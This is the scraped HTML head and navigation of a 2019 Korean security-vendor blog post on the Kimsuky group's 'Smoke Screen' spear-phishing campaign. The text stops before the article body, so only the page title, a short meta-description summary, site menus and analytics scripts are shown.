CINXE.COM
암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2
<!DOCTYPE html> <html lang="ko"> <head> <script type="text/javascript">if (!window.T) { window.T = {} } window.T.config = {"TOP_SSL_URL":"https://www.tistory.com","PREVIEW":false,"ROLE":"guest","PREV_PAGE":"","NEXT_PAGE":"","BLOG":{"id":1638807,"name":"alyacofficialblog","title":"이스트시큐리티 알약 블로그","isDormancy":true,"nickName":"알약(Alyac)","status":"open","profileStatus":"normal"},"NEED_COMMENT_LOGIN":true,"COMMENT_LOGIN_CONFIRM_MESSAGE":"이 블로그는 로그인한 사용자에게만 댓글 작성을 허용했습니다. 지금 로그인하시겠습니까?","LOGIN_URL":"https://www.tistory.com/auth/login/?redirectUrl=https://blog.alyac.co.kr/2299","DEFAULT_URL":"https://blog.alyac.co.kr","USER":{"name":null,"homepage":null,"id":0,"profileImage":null},"SUBSCRIPTION":{"status":"none","isConnected":false,"isPending":false,"isWait":false,"isProcessing":false,"isNone":true},"IS_LOGIN":false,"HAS_BLOG":false,"IS_SUPPORT":false,"IS_SCRAPABLE":false,"TOP_URL":"http://www.tistory.com","JOIN_URL":"https://www.tistory.com/member/join","PHASE":"prod","ROLE_GROUP":"visitor"}; window.T.entryInfo = {"entryId":2299,"isAuthor":false,"categoryId":957259,"categoryLabel":"악성코드 분석 리포트"}; window.appInfo = {"domain":"tistory.com","topUrl":"https://www.tistory.com","loginUrl":"https://www.tistory.com/auth/login","logoutUrl":"https://www.tistory.com/auth/logout"}; window.initData = {}; window.TistoryBlog = { basePath: "", url: "https://blog.alyac.co.kr", tistoryUrl: "https://alyacofficialblog.tistory.com", manageUrl: "https://alyacofficialblog.tistory.com/manage", token: "YDXz4mOL53RLM4DCG1zU+EtvdPXDsNbG7G58aLaelQWYV5ZD4k+GEyfR+dnByY1r" }; var servicePath = ""; var blogURL = "";</script> <!-- BusinessLicenseInfo - START --> <link href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/plugin/BusinessLicenseInfo/style.css" rel="stylesheet" type="text/css"/> <script>function switchFold(entryId) { var businessLayer = document.getElementById("businessInfoLayer_" + entryId); if (businessLayer) { if (businessLayer.className.indexOf("unfold_license") > 0) { businessLayer.className = "business_license_layer"; } else { businessLayer.className = "business_license_layer unfold_license"; } } } </script> <!-- BusinessLicenseInfo - END --> <!-- DaumShow - START --> <style type="text/css">#daumSearchBox { height: 21px; background-image: url(//i1.daumcdn.net/imgsrc.search/search_all/show/tistory/plugin/bg_search2_2.gif); margin: 5px auto; padding: 0; } #daumSearchBox input { background: none; margin: 0; padding: 0; border: 0; } #daumSearchBox #daumLogo { width: 34px; height: 21px; float: left; margin-right: 5px; background-image: url(//i1.daumcdn.net/img-media/tistory/img/bg_search1_2_2010ci.gif); } #daumSearchBox #show_q { background-color: transparent; border: none; font: 12px Gulim, Sans-serif; color: #555; margin-top: 4px; margin-right: 15px; float: left; } #daumSearchBox #show_btn { background-image: url(//i1.daumcdn.net/imgsrc.search/search_all/show/tistory/plugin/bt_search_2.gif); width: 37px; height: 21px; float: left; margin: 0; cursor: pointer; text-indent: -1000em; } </style> <!-- DaumShow - END --> <!-- System - START --> <!-- System - END --> <!-- TistoryProfileLayer - START --> <link href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/plugin/TistoryProfileLayer/style.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/plugin/TistoryProfileLayer/script.js"></script> <!-- TistoryProfileLayer - END --> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="format-detection" content="telephone=no"> <script src="//t1.daumcdn.net/tistory_admin/lib/jquery/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script> <script type="text/javascript" src="//t1.daumcdn.net/tiara/js/v1/tiara.min.js"></script><meta name="referrer" content="always"/> <meta name="google-adsense-platform-account" content="ca-host-pub-9691043933427338"/> <meta name="google-adsense-platform-domain" content="tistory.com"/> <meta name="description" content="안녕하세요? 이스트시큐리티 시큐리티 대응센터(이하 ESRC) 입니다. 지난 04월 17일 "한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개" 리포팅을 통해 한국과 미국을 대상으로 은밀하게 수행 중인 APT 공격의 배후가 드러난 바 있습니다. 약 한달이 지난 지금까지도 '스모크 스크린' 캠페인을 벌인 조직의 대남, 대미 사이버 첩보 활동이 멈추지 않고 있습니다. 흥미로운 점은 이들이 한국과 미국을 상대로 스피어 피싱(Spear Phishing) 공격을 수행하면서, 보안 탐지 시스템을 간단하게 우회하고 있다는 것입니다. ■ 보안 기밀 문서로 위장한 연막(스모크 스크린) 작전 배경 ESRC는 한국과 미국의 북한관련 분야에 종사하는 전문직만 겨냥한 이들의 활동을 관찰하고 분석하면서 공통적인.."/> <meta property="og:type" content="article"/> <meta property="og:url" content="https://blog.alyac.co.kr/2299"/> <meta property="og.article.author" content="알약(Alyac)"/> <meta property="og:site_name" content="이스트시큐리티 알약 블로그"/> <meta property="og:title" content="암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2"/> <meta name="by" content="알약(Alyac)"/> <meta property="og:description" content="안녕하세요? 이스트시큐리티 시큐리티 대응센터(이하 ESRC) 입니다. 지난 04월 17일 "한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개" 리포팅을 통해 한국과 미국을 대상으로 은밀하게 수행 중인 APT 공격의 배후가 드러난 바 있습니다. 약 한달이 지난 지금까지도 '스모크 스크린' 캠페인을 벌인 조직의 대남, 대미 사이버 첩보 활동이 멈추지 않고 있습니다. 흥미로운 점은 이들이 한국과 미국을 상대로 스피어 피싱(Spear Phishing) 공격을 수행하면서, 보안 탐지 시스템을 간단하게 우회하고 있다는 것입니다. ■ 보안 기밀 문서로 위장한 연막(스모크 스크린) 작전 배경 ESRC는 한국과 미국의 북한관련 분야에 종사하는 전문직만 겨냥한 이들의 활동을 관찰하고 분석하면서 공통적인.."/> <meta property="og:image" content="https://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99122D365CD9FCC925"/> <meta property="article:section" content="'IT 인터넷'"/> <meta name="twitter:card" content="summary_large_image"/> <meta name="twitter:site" content="@TISTORY"/> <meta name="twitter:title" content="암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2"/> <meta name="twitter:description" content="안녕하세요? 이스트시큐리티 시큐리티 대응센터(이하 ESRC) 입니다. 지난 04월 17일 "한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개" 리포팅을 통해 한국과 미국을 대상으로 은밀하게 수행 중인 APT 공격의 배후가 드러난 바 있습니다. 약 한달이 지난 지금까지도 '스모크 스크린' 캠페인을 벌인 조직의 대남, 대미 사이버 첩보 활동이 멈추지 않고 있습니다. 흥미로운 점은 이들이 한국과 미국을 상대로 스피어 피싱(Spear Phishing) 공격을 수행하면서, 보안 탐지 시스템을 간단하게 우회하고 있다는 것입니다. ■ 보안 기밀 문서로 위장한 연막(스모크 스크린) 작전 배경 ESRC는 한국과 미국의 북한관련 분야에 종사하는 전문직만 겨냥한 이들의 활동을 관찰하고 분석하면서 공통적인.."/> <meta property="twitter:image" content="https://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99122D365CD9FCC925"/> <meta content="https://blog.alyac.co.kr/2299" property="dg:plink" content="https://blog.alyac.co.kr/2299"/> <meta name="plink"/> <meta name="title" content="암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2"/> <meta name="article:media_name" content="이스트시큐리티 알약 블로그"/> <meta property="article:mobile_url" content="https://blog.alyac.co.kr/m/2299"/> <meta property="article:pc_url" content="https://blog.alyac.co.kr/2299"/> <meta property="article:mobile_view_url" content="https://alyacofficialblog.tistory.com/m/2299"/> <meta property="article:pc_view_url" content="https://alyacofficialblog.tistory.com/2299"/> <meta property="article:talk_channel_view_url" content="https://blog.alyac.co.kr/m/2299"/> <meta property="article:pc_service_home" content="https://www.tistory.com"/> <meta property="article:mobile_service_home" content="https://www.tistory.com/m"/> <meta property="article:txid" content="1638807_2299"/> <meta property="article:published_time" content="2019-05-13T17:34:23+09:00"/> <meta property="og:regDate" content="20190512032805"/> <meta property="article:modified_time" content="2019-05-14T08:25:09+09:00"/> <script type="module" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/pc/dist/index.js" defer=""></script> <script type="text/javascript" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/pc/dist/index-legacy.js" defer="" nomodule="true"></script> <script type="text/javascript" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/pc/dist/polyfills-legacy.js" defer="" nomodule="true"></script> <link rel="stylesheet" type="text/css" href="https://t1.daumcdn.net/tistory_admin/www/style/font.css"/> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/style/content.css"/> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/pc/dist/index.css"/> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/style/uselessPMargin.css"/> <script type="text/javascript">(function() { var tjQuery = jQuery.noConflict(true); window.tjQuery = tjQuery; window.orgjQuery = window.jQuery; window.jQuery = tjQuery; window.jQuery = window.orgjQuery; delete window.orgjQuery; })()</script> <script type="text/javascript" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/script/base.js"></script> <script type="text/javascript" src="//developers.kakao.com/sdk/js/kakao.min.js"></script> <title>암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2</title> <meta name="title" content="암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2" /> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" /> <link rel="alternate" type="application/rss+xml" title="이스트시큐리티 알약 블로그" href="https://alyacofficialblog.tistory.com/rss" /> <link rel="shortcut icon" href="https://blog.alyac.co.kr/favicon.ico" /> <link rel="stylesheet" href="https://tistory1.daumcdn.net/tistory/1638807/skin/images/webfonticon.css?_version_=1700094200" /> <link rel="stylesheet" href="https://tistory1.daumcdn.net/tistory/1638807/skin/images/slick.css?_version_=1700094200" /> <link rel="stylesheet" href="https://tistory1.daumcdn.net/tistory/1638807/skin/style.css?_version_=1700094200" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.js"></script> <script src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/slick.js?_version_=1700094200"></script> <script src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/iscroll.js?_version_=1700094200"></script> <script src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/front.js?_version_=1700094200"></script> <script src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/common.js?_version_=1700094200"></script> <!-- Meta Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '377642042570059'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=377642042570059&ev=PageView&noscript=1" /></noscript> <!-- End Meta Pixel Code --> <!-- KAKAO Pixel Code --> <script type="text/javascript" charset="UTF-8" src="//t1.daumcdn.net/kas/static/kp.js"></script> <script type="text/javascript"> kakaoPixel('6354858201835485227').pageView(); </script> <!-- End KAKAO Pixel Code --> <!----구글 애널리틱스 시작-----> <script> (function(i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function() { (i[r].q = i[r].q || []).push(arguments) }, i[r].l = 1 * new Date(); a = s.createElement(o), m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m) })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga'); ga('create', 'UA-50328716-1', 'alyac.co.kr'); ga('send', 'pageview'); </script> <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-37M0P3XN5G"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-37M0P3XN5G'); </script> <!----구글 애널리틱스 끝-----> <style type="text/css">.another_category { border: 1px solid #E5E5E5; padding: 10px 10px 5px; margin: 10px 0; clear: both; } .another_category h4 { font-size: 12px !important; margin: 0 !important; border-bottom: 1px solid #E5E5E5 !important; padding: 2px 0 6px !important; } .another_category h4 a { font-weight: bold !important; } .another_category table { table-layout: fixed; border-collapse: collapse; width: 100% !important; margin-top: 10px !important; } * html .another_category table { width: auto !important; } *:first-child + html .another_category table { width: auto !important; } .another_category th, .another_category td { padding: 0 0 4px !important; } .another_category th { text-align: left; font-size: 12px !important; font-weight: normal; word-break: break-all; overflow: hidden; line-height: 1.5; } .another_category td { text-align: right; width: 80px; font-size: 11px; } .another_category th a { font-weight: normal; text-decoration: none; border: none !important; } .another_category th a.current { font-weight: bold; text-decoration: none !important; border-bottom: 1px solid !important; } .another_category th span { font-weight: normal; text-decoration: none; font: 10px Tahoma, Sans-serif; border: none !important; } .another_category_color_gray, .another_category_color_gray h4 { border-color: #E5E5E5 !important; } .another_category_color_gray * { color: #909090 !important; } .another_category_color_gray th a.current { border-color: #909090 !important; } .another_category_color_gray h4, .another_category_color_gray h4 a { color: #737373 !important; } .another_category_color_red, .another_category_color_red h4 { border-color: #F6D4D3 !important; } .another_category_color_red * { color: #E86869 !important; } .another_category_color_red th a.current { border-color: #E86869 !important; } .another_category_color_red h4, .another_category_color_red h4 a { color: #ED0908 !important; } .another_category_color_green, .another_category_color_green h4 { border-color: #CCE7C8 !important; } .another_category_color_green * { color: #64C05B !important; } .another_category_color_green th a.current { border-color: #64C05B !important; } .another_category_color_green h4, .another_category_color_green h4 a { color: #3EA731 !important; } .another_category_color_blue, .another_category_color_blue h4 { border-color: #C8DAF2 !important; } .another_category_color_blue * { color: #477FD6 !important; } .another_category_color_blue th a.current { border-color: #477FD6 !important; } .another_category_color_blue h4, .another_category_color_blue h4 a { color: #1960CA !important; } .another_category_color_violet, .another_category_color_violet h4 { border-color: #E1CEEC !important; } .another_category_color_violet * { color: #9D64C5 !important; } .another_category_color_violet th a.current { border-color: #9D64C5 !important; } .another_category_color_violet h4, .another_category_color_violet h4 a { color: #7E2CB5 !important; } </style> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/style/revenue.css"/> <link rel="canonical" href="https://blog.alyac.co.kr/2299"/> <!-- BEGIN STRUCTURED_DATA --> <script type="application/ld+json"> {"@context":"http://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@id":"https://blog.alyac.co.kr/2299","name":null},"url":"https://blog.alyac.co.kr/2299","headline":"암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2","description":"안녕하세요? 이스트시큐리티 시큐리티 대응센터(이하 ESRC) 입니다. 지난 04월 17일 "한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개" 리포팅을 통해 한국과 미국을 대상으로 은밀하게 수행 중인 APT 공격의 배후가 드러난 바 있습니다. 약 한달이 지난 지금까지도 '스모크 스크린' 캠페인을 벌인 조직의 대남, 대미 사이버 첩보 활동이 멈추지 않고 있습니다. 흥미로운 점은 이들이 한국과 미국을 상대로 스피어 피싱(Spear Phishing) 공격을 수행하면서, 보안 탐지 시스템을 간단하게 우회하고 있다는 것입니다. ■ 보안 기밀 문서로 위장한 연막(스모크 스크린) 작전 배경 ESRC는 한국과 미국의 북한관련 분야에 종사하는 전문직만 겨냥한 이들의 활동을 관찰하고 분석하면서 공통적인..","author":{"@type":"Person","name":"알약(Alyac)","logo":null},"image":{"@type":"ImageObject","url":"https://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99122D365CD9FCC925","width":"800px","height":"800px"},"datePublished":"2019-05-13T17:34:23+09:00","dateModified":"2019-05-14T08:25:09+09:00","publisher":{"@type":"Organization","name":"TISTORY","logo":{"@type":"ImageObject","url":"https://t1.daumcdn.net/tistory_admin/static/images/openGraph/opengraph.png","width":"800px","height":"800px"}}} </script> <!-- END STRUCTURED_DATA --> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/style/dialog.css"/> <link rel="stylesheet" type="text/css" href="//t1.daumcdn.net/tistory_admin/www/style/top/font.css"/> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/style/postBtn.css"/> <link rel="stylesheet" type="text/css" href="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/style/tistory.css"/> <script type="text/javascript" src="https://tistory1.daumcdn.net/tistory_admin/userblog/userblog-6a37c349bf45303da350f382df934ec2f7d06d2a/static/script/common.js"></script> </head> <body id="tt-body-page" class="theme_blue"> <!-- theme --> <div id="container"> <div id="header" class="header"> <div class="inner_header"> <div class="box_header"> <h1 class="logo"> <a href="https://blog.alyac.co.kr/" title="이스트시큐리티 알약 블로그" class="link_logo"> <img src="https://tistory1.daumcdn.net/tistory/1638807/skin/images/logo_estsecurity.png" class="img_logo" alt="ESTsecurity" /> </a> </h1> <div class="nav_box"> <ul class="tt_category"><li class=""><a href="/category" class="link_tit"> 전체보기 <span class="c_cnt">(5300)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a> <ul class="category_list"><li class=""><a href="/category/%EC%9D%B4%EC%8A%A4%ED%8A%B8%EC%8B%9C%ED%81%90%EB%A6%AC%ED%8B%B0%20%EC%86%8C%EC%8B%9D" class="link_item"> 이스트시큐리티 소식 <span class="c_cnt">(341)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a></li> <li class=""><a href="/category/%EA%B5%AD%EB%82%B4%EC%99%B8%20%EB%B3%B4%EC%95%88%EB%8F%99%ED%96%A5" class="link_item"> 국내외 보안동향 <span class="c_cnt">(2786)</span> </a></li> <li class=""><a href="/category/%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8" class="link_item"> 악성코드 분석 리포트 <span class="c_cnt">(1209)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a></li> <li class=""><a href="/category/%EC%A0%84%EB%AC%B8%EA%B0%80%20%EA%B8%B0%EA%B3%A0" class="link_item"> 전문가 기고 <span class="c_cnt">(127)</span> </a></li> <li class=""><a href="/category/%EC%95%8C%EC%95%BD%E4%BA%BA%20%EC%9D%B4%EC%95%BC%EA%B8%B0" class="link_item"> 알약人 이야기 <span class="c_cnt">(66)</span> </a></li> <li class=""><a href="/category/%EC%9D%B4%EB%B2%A4%ED%8A%B8" class="link_item"> 이벤트 <span class="c_cnt">(46)</span> </a></li> <li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81" class="link_item"> 안전한 PC&모바일 세상 <span class="c_cnt">(716)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a> <ul class="sub_category_list"><li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81/%EB%B3%B4%EC%95%88%ED%88%B0" class="link_sub_item"> 보안툰 <span class="c_cnt">(24)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a></li> <li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81/PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20TIP" class="link_sub_item"> PC&모바일 TIP <span class="c_cnt">(112)</span> </a></li> <li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81/%EC%8A%A4%EB%AF%B8%EC%8B%B1%20%EC%95%8C%EB%A6%BC" class="link_sub_item"> 스미싱 알림 <span class="c_cnt">(579)</span> </a></li> </ul> </li> </ul> </li> </ul> </div> <div class="btn_box"> <!-- GNB --> <button type="button" class="btn_util btn_search" title="검색"><span class="blind">검색</span></button> <button type="button" class="btn_util btn_menu" title="메뉴"><span class="blind">메뉴</span></button> </div> </div> <!-- fixed menu only detail --> <div class="box_header box_fix_header"> <h2 class="blind">고정 헤더 영역</h2> <div class="area_menu"> <a href="#" title="페이지 뒤로가기" class="btn_util link_back"> <span class="box_svg"> <svg xmlns="http://www.w3.org/2000/svg" width="15" height="26" viewBox="0 0 15 26" class="img_svg"> <defs> <path id="mainSlideArrowLeft" d="M12 20L25 7l1.4 1.4L14.8 20l11.6 11.6L25 33z"></path> </defs> <g fill="none" fill-rule="evenodd" transform="translate(-13 -5)"> <path d="M0 0h40v40H0z"></path> <mask id="mainSlideArrowLeftMask" fill="#fff"> <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mainSlideArrowLeft"></use> </mask> <g fill="#fff" fill-opacity="1" mask="url(#mainSlideArrowLeftMask)" class="svg_bg"> <path d="M0 0h40v40H0z"></path> </g> </g> </svg> </span> </a> <div class="box_fix_tit"> <span class="blind">글 제목</span> <p class="txt_fix_tit"></p> </div> <button type="button" class="btn_util btn_menu" title="메뉴"><span class="blind">메뉴</span></button> </div> </div> </div> </div> <!-- header close --> <div class="ly_area nav" style="display:none"> <div class="inner_ly_area"> <div class="ly_header"> <h2 class="blind">메뉴 레이어</h2> <div class="ly_logo"> <a href="https://blog.alyac.co.kr/" title="이스트시큐리티 알약 블로그" class="link_logo"> <img src="https://tistory2.daumcdn.net/tistory/1638807/skinSetting/6a7eaddb429c49b4a970556ab13ede25" class="img_logo" alt="로고 이미지"> </a> </div> <button type="button" title="레이어 닫기" class="btn_menu_close btn_ly_close"> </button> </div> <!-- ly_header --> <h3 class="blind">메뉴 리스트</h3> <div class="tistory_support_menus"> <ul></ul> <ul class="tt_category"><li class=""><a href="/category" class="link_tit"> 전체보기 <span class="c_cnt">(5300)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a> <ul class="category_list"><li class=""><a href="/category/%EC%9D%B4%EC%8A%A4%ED%8A%B8%EC%8B%9C%ED%81%90%EB%A6%AC%ED%8B%B0%20%EC%86%8C%EC%8B%9D" class="link_item"> 이스트시큐리티 소식 <span class="c_cnt">(341)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a></li> <li class=""><a href="/category/%EA%B5%AD%EB%82%B4%EC%99%B8%20%EB%B3%B4%EC%95%88%EB%8F%99%ED%96%A5" class="link_item"> 국내외 보안동향 <span class="c_cnt">(2786)</span> </a></li> <li class=""><a href="/category/%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8" class="link_item"> 악성코드 분석 리포트 <span class="c_cnt">(1209)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a></li> <li class=""><a href="/category/%EC%A0%84%EB%AC%B8%EA%B0%80%20%EA%B8%B0%EA%B3%A0" class="link_item"> 전문가 기고 <span class="c_cnt">(127)</span> </a></li> <li class=""><a href="/category/%EC%95%8C%EC%95%BD%E4%BA%BA%20%EC%9D%B4%EC%95%BC%EA%B8%B0" class="link_item"> 알약人 이야기 <span class="c_cnt">(66)</span> </a></li> <li class=""><a href="/category/%EC%9D%B4%EB%B2%A4%ED%8A%B8" class="link_item"> 이벤트 <span class="c_cnt">(46)</span> </a></li> <li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81" class="link_item"> 안전한 PC&모바일 세상 <span class="c_cnt">(716)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a> <ul class="sub_category_list"><li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81/%EB%B3%B4%EC%95%88%ED%88%B0" class="link_sub_item"> 보안툰 <span class="c_cnt">(24)</span> <img alt="N" src="https://tistory1.daumcdn.net/tistory_admin/blogs/image/category/new_ico_5.gif" style="vertical-align:middle;padding-left:2px;"/></a></li> <li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81/PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20TIP" class="link_sub_item"> PC&모바일 TIP <span class="c_cnt">(112)</span> </a></li> <li class=""><a href="/category/%EC%95%88%EC%A0%84%ED%95%9C%20PC%26%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EC%84%B8%EC%83%81/%EC%8A%A4%EB%AF%B8%EC%8B%B1%20%EC%95%8C%EB%A6%BC" class="link_sub_item"> 스미싱 알림 <span class="c_cnt">(579)</span> </a></li> </ul> </li> </ul> </li> </ul> </div> <div class="box_home"> </div> <ul class="list_category"> </ul> </div> </div> <!-- nav --> <div class="ly_area search_area" style="display:none"> <div class="inner_ly_area"> <div class="ly_header"> <h2 class="blind">검색 레이어</h2> <div class="ly_logo"> <a href="https://blog.alyac.co.kr/" title="이스트시큐리티 알약 블로그" class="link_logo"> <!-- logo img --> <img src="https://tistory2.daumcdn.net/tistory/1638807/skinSetting/6a7eaddb429c49b4a970556ab13ede25" class="img_logo" alt="로고 이미지"> </a> </div> <button type="button" title="레이어 닫기" class="btn_menu_close btn_ly_close"> <span class="box_svg"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" class="img_svg"> <defs> <path id="searchCloseSvg" d="M33.4 8L32 6.6l-12 12-12-12L6.6 8l12 12-12 12L8 33.4l12-12 12 12 1.4-1.4-12-12z" /> </defs> </svg> </span> </button> </div> <!-- ly_header --> <h3 class="blind">검색 영역</h3> <form action="" method="get"> <legend><span class="blind">컨텐츠 검색</span></legend> <div class="box_form"> <input type="text" name="search" title="검색어 입력" placeholder="검색어 입력.." value="" class="inp_search" onkeypress="if (event.keyCode == 13) { try { window.location.href = '/search' + '/' + looseURIEncode(document.getElementsByName('search')[0].value); document.getElementsByName('search')[0].value = ''; return false; } catch (e) {} }"> <button type="button" title="검색어 삭제" class="btn_search_del"> <svg xmlns="http://www.w3.org/2000/svg" width="36" height="36" viewBox="0 0 36 36" class="img_svg"> <defs> <path id="textDelBtnSvg" d="M20 2C10.059 2 2 10.059 2 20s8.059 18 18 18 18-8.059 18-18S29.941 2 20 2zm8 24.6L26.6 28 20 21.4 13.4 28 12 26.6l6.6-6.6-6.6-6.6 1.4-1.4 6.6 6.6 6.6-6.6 1.4 1.4-6.6 6.6 6.6 6.6z" /> </defs> <g fill="none" fill-rule="evenodd" transform="translate(-2 -2)"> <path d="M0 0h40v40H0z" /> <mask id="textDelBtnSvgMask" fill="#fff"> <use xlink:href="#textDelBtnSvg" /> </mask> <g fill="#000" fill-opacity="1" mask="url(#textDelBtnSvgMask)" class="svg_bg"> <path d="M0 0h40v40H0z" /> </g> </g> </svg> </button> </div> </form> </div> </div> <!-- search_area --> <div class="wrap_content"> </div> <!-- sub page --> <div class="wrap_content wrap_detail_content"> <!-- 메인 페이지에서 목록 표현 --> <!-- // 메인 페이지에서 목록 표현 --> <!-- 치환자 <s_article_rep> 적용 --> <div id="content_permallink_article" class="content sub_content sub_detail"> 